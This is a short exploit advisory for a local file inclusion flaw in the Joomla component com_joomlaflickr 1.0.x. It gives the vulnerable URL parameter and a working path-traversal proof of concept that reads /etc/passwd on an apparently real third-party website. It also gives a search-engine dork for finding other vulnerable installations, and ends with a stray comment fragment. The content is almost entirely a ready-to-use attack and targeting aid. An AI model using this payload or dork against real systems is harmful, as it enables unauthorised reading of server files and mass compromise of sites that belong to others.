Joomla Component Joomla Flickr LFI Vuln


[o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability
Software : com_joomlaflickr version 1.0.x
Vendor : http://aloiroberto.wordpress.com/software/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_joomlaflickr&controller=[LFI]


[o] PoC
http://www.theknokkies.nl/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_joomlaflickr"


One Response so far.

  1. Change to no to disable tunnelled clear text passwords...